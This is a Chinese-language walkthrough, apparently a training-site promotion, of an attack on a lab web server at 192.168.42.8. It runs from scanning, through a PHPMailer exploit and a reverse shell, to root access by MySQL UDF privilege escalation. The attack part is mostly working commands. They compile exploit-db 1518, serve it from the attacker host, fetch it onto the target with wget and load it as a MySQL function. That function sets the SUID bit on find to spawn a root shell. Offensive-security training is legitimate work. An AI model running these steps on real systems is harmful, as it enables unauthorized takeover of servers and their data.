黑客渗透网站实战mysql提权操作，你明白吗???

1、Mysql提权简介

我们都知道网站所用脚本之间的不同权限也就大概的可以看出来，jsp 的默认权限一般都是 system 权限，而 aspx 的一般来说都高于 user 权限，一般来说。asp 和 PHP 的权限差不多，Pl ，cgi ，py 的权限一般和 Aspx 的差不多，MySQL 数据库提权之前，也就是最重要的一点，我们要知道 root 账号和密码，这个也就是最重要的，因为他有写入权限啊！！！

一般获取 root 账号密码主要分为 这几个突破口 ： 数据库配置文件、端口破解口令、下载数据库文件获取等

。

2、mysql实战提权操作

1)、首先，我们如果拿到目标站，第一步可以通过masscan工具扫描目标主机的80端口，探测到存活机器，命令和数据如下：

masscan 192.168.42.0/24 -p80
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-03-11 09:17:21 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 256 hosts [1 port/host]
Discovered open port 80/tcp on 192.168.42.8

2)、接着我们就用nmap工具搜集探测一下漏洞，这里用到了nmap的脚本，数据和命令如下：

nmap -T5 -A 192.168.42.8 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-11 17:22 CST
Nmap scan report for 192.168.42.8
Host is up (0.00059s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.42.8

3)、接着基本的操作就是我们的目录扫描，我们这里可以用到常见的御剑扫描工具。看看有没有什么敏感的信息和文件

通过目录扫描，我们发现了目录遍历漏洞，根据我们黑客渗透的经验，我们可以从中查看一些敏感的信息和重要文件，对我们后面的黑客渗透给予很大的帮助

在查看目录的时候，通过看这个dist文件，我们得知看见目标网站是PHPMailer的程序，通过找其中的信息，发现是5.2.16版本的

那么我们就可以在百度搜索一下相关的漏洞，也可以通过Kali Linux渗透系统这里就通过searchsploit 工具搜索到相关漏洞的漏洞攻击脚本

执行searchsploit 命令：searchsploit PHPMailer搜索出相关的漏洞exp

由于exp是python编写的，我们这里要安装一下相关的python库

执行命令：pip install requests-toolbelt安装requests-toolbelt库

4)、经过exp成功反弹拿到shell

执行命令python -c 'import pty;pty.spawn("/bin/bash")'添加python伪终端，可以看到权限为www权限，那么这里我们就需要去进行一方面的提权提升

通过翻php的配置文件，看到了mysql的账号密码

查看一下相关的启动，发现mysql是以root启动

我们可以打开mysql查看版本

5)、下载提权exp在kali上面，编译在kali上编译

执行wget https://www.exploit-db.com/download/1518 下载提权的exp代码

接着执行gcc -g -c 1518.c

gcc -g -shared -o 1518.so 1518.o -lc

得到1518.so文件

然后在kali上创建临时服务，执行命令python -m SimpleHTTPServer 8081开启一个http

我们接着在靶机上执行先切换到/tmp目录下

执行命令wget http://192.168.42.4:8081/1518.so 下载好我们刚才编译好的exp

下载完成

下载完了我们就再次登录数据库执行以下命令

use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
select * from mysql.func;
select do_system('chmod u+s /usr/bin/find');
find ./ -exec "/bin/sh" \;

最后可以看见，提权成功。

为什么选择安界网？

安界网贯彻人才培养理念，结合专业研发团队，打造课程内容体系，推进实训平台发展，通过一站式成长计划、推荐就业以及陪护指导的师带徒服务，为学员的继续学习和职业发展保驾护航，真正实现和完善网络安全精英的教练场平台；

关注私信‘资料’

如果你想实现进高企、就高职、拿高薪，即使低学历也可实现职业发展中的第一个“弯道超车”！安界网就是你唯一选择，赶紧私信我！等你来！

点击关注我的头条号，0基础掌握更多黑客秘籍

私信回复‘’资料‘’领取更多技术文章和学习资料，加入专属的安全学习圈一起进步